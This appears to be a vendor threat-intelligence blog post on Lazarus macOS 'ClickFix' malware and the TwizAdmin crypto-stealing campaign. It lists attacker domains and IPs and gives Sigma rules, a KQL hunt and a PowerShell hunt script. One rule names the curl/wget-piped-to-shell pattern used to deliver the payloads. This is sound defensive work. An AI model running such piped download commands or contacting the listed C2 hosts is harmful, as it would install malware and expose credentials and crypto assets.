Back to Intelligence

Mach-O Man & TwizAdmin: Lazarus macOS Operations and Multi-Stage Crypto-Theft

SA
Security Arsenal Team
May 25, 2026
5 min read

Recent OTX pulses indicate a surge in sophisticated multi-platform threats targeting financial assets and credential infrastructure. The Lazarus Group is actively pushing "Mach-O Man" malware via "ClickFix" social engineering on macOS, impersonating collaboration tools to steal credentials and session tokens. Simultaneously, the "DataBreachPlus" group is operating a "TwizAdmin" campaign, a multi-stage Malware-as-a-Service (MaaS) focusing on cryptocurrency clipboard hijacking and seed phrase theft across Windows and macOS. Furthermore, a massive infrastructure mapping reveals over 1,350 active C2 servers concentrated in the Middle East (hosted largely by Saudi Telecom), facilitating operations for APTs including APT28 and Eagle Werewolf using families like LockBit, Phorpiex, and Cobalt Strike.

Threat Actor / Malware Profile

Lazarus Group (Mach-O Man)

  • Distribution: Telegram-based fake meeting invitations (Zoom/Teams) leading to fraudulent collaboration sites.
  • Payload Behavior: Uses "ClickFix" techniques to trick users into running terminal commands. Deploys "PyLangGhostRAT", a Python-based RAT focused on browser data exfiltration and Telegram communication.
  • Persistence: Uses LaunchAgents/LaunchDaemons (typical for Mach-O persistence) disguised as legitimate system update processes.

DataBreachPlus (TwizAdmin)

  • Distribution: Phishing campaigns impersonating FedEx and logistics entities.
  • Payload Behavior: Multi-stage operation. First stage is a clipper targeting 8 crypto chains. Second stage steals BIP-39 seed phrases and browser credentials. Third stage deploys "crpx0" ransomware.
  • C2 Communication: Managed via a FastAPI-based panel hosted on 103.241.66[.]238:1337, featuring a license key system.
  • Anti-Analysis: Likely uses packing/obfuscation typical of Python-based malware builders.

IOC Analysis

The provided IOCs reveal a blend of infrastructure and payload indicators.

  • Domains: fanonlyatn.xyz (TwizAdmin C2/Filehost) and livemicrosft.com (Lazarus typosquatting) require immediate blocking on DNS Proxies and Secure Web Gateways.
  • File Hashes: Multiple SHA256 hashes correspond to the Mach-O binaries and TwizAdmin droppers. SOC teams should push these to EDR for quarantine.
  • Network Indicators: A specific set of Middle Eastern IPs (e.g., 37.32.15.8, 197.51.170.131) are linked to C2 infrastructure for various RATs and Botnets. Geolocation blocking or ZTNA policies should be reviewed for these regions.

Detection Engineering

YAML
title: Potential macOS ClickFix Execution - Mach-O Man
id: 8a7b6c5d-4e3f-2a1b-9c8d-7e6f5a4b3c2d
description: Detects suspicious terminal execution patterns associated with the Mach-O Man ClickFix campaign where users are tricked into piping curl/wget output into bash or python.
status: experimental
author: Security Arsenal
date: 2026/05/26
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: macos
    category: process_creation
detection:
    selection_curl:
        Image|endswith:
            - '/curl'
            - '/wget'
        CommandLine|contains:
            - '| python3'
            - '| sh'
            - '| bash'
    selection_indicators:
        CommandLine|contains:
            - 'livemicrosft.com'
            - 'meeting'
    condition: selection_curl or selection_indicators
falsepositives:
    - Legitimate developer tooling (rare)
level: high
---
title: TwizAdmin C2 Infrastructure Connection
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects network connections to known TwizAdmin C2 infrastructure or the specific FastAPI panel port associated with the campaign.
status: experimental
author: Security Arsenal
date: 2026/05/26
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.c2
    - attack.t1071.001
logsource:
    product: windows
    category: network_connection
detection:
    selection_domain:
        DestinationHostname|contains:
            - 'fanonlyatn.xyz'
    selection_port:
        DestinationPort: 1337
    selection_ip:
        DestinationIp:
            - '103.241.66.238'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
---
title: Suspicious Middle East C2 Traffic
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects outbound connections to IP addresses identified as part of the large-scale Middle Eastern C2 infrastructure mapping.
status: experimental
author: Security Arsenal
date: 2026/05/26
references:
    - https://hunt.io/blog/middle-east-malicious-infrastructure-report
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    product: windows
    category: network_connection
detection:
    selection:
        DestinationIp|cidr:
            - '37.32.15.8/32'
            - '197.51.170.131/32'
            - '5.109.182.231/32'
            - '93.113.62.247/32'
            - '94.252.245.193/32'
    filter_legit:
        DestinationHostname|endswith:
            - '.microsoft.com'
            - '.amazonaws.com'
            - '.google.com'
    condition: selection and not filter_legit
level: medium


kql
// Hunt for connections to known malicious domains and IPs
let IOCs_Domains = dynamic(["fanonlyatn.xyz", "livemicrosft.com"]);
let IOCs_IPs = dynamic(["37.32.15.8", "197.51.170.131", "103.241.66.238", "5.109.182.231", "93.113.62.247", "94.252.245.193"]);
DeviceNetworkEvents
| where RemoteUrl has_any (IOCs_Domains) or RemoteIP in (IOCs_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort, ActionType
| order by Timestamp desc


powershell
# PowerShell Hunt Script for TwizAdmin and Mach-O Man Artifacts
# Check for malicious domains in DNS cache or Hosts file
$maliciousDomains = @("fanonlyatn.xyz", "livemicrosft.com")
$hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
Write-Host "Checking Hosts file for malicious entries..." -ForegroundColor Yellow
if (Test-Path $hostsPath) {
    $hostsContent = Get-Content $hostsPath
    foreach ($domain in $maliciousDomains) {
        if ($hostsContent -match $domain) {
            Write-Host "ALERT: Found $domain in hosts file!" -ForegroundColor Red
        }
    }
}

# Check for TwizAdmin Crypto Clipper processes (Common names or paths)
$processNames = @("crpx0", "twizadmin", "python", "cmd")
Write-Host "Checking for suspicious processes..." -ForegroundColor Yellow
Get-Process | Where-Object { $processNames -contains $_.ProcessName -or $_.MainWindowTitle -like "*crypto*" } | Select-Object ProcessName, Id, Path


# Response Priorities

*   **Immediate:** Block all listed IOCs (domains and IPs) at the perimeter firewall and proxy servers. Isolate any endpoints communicating with `103.241.66[.]238` or `fanonlyatn.xyz`.
*   **24h:** Conduct credential audits for employees who may have interacted with fake meeting invites (Telegram/Email). Force password resets and rotate API keys for fintech/cryptocurrency accounts if TwizAdmin activity is suspected.
*   **1 Week:** Implement geo-blocking policies for non-essential business traffic to the Middle Eastern IP ranges identified. Update macOS security baselines to restrict unsigned Mach-O binary execution and educate users on "ClickFix" social engineering.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptlazarus-grouptwizadminmacos-malwareclickfixc2-infrastructure

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action